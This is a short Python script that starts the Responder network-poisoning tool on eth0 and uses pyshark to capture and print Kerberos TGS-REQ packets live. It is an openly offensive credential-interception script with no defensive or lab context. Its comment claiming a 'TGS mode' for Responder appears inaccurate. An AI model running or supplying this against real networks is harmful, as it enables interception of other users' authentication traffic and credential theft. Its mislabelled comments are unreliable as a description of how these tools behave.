#!/usr/bin/env python

import os
import pyshark

# Start Responder in TGS mode
os.system('responder -I eth0 -rdw')

# Set up Wireshark capture filter
wireshark_filter = 'udp.port==88 && kerberos.msg_type==12'

# Start Wireshark capture
capture = pyshark.LiveCapture(interface='eth0', display_filter=wireshark_filter)

# Capture TGS-REQ messages
for packet in capture.sniff_continuously():
    print(packet.kerberos)
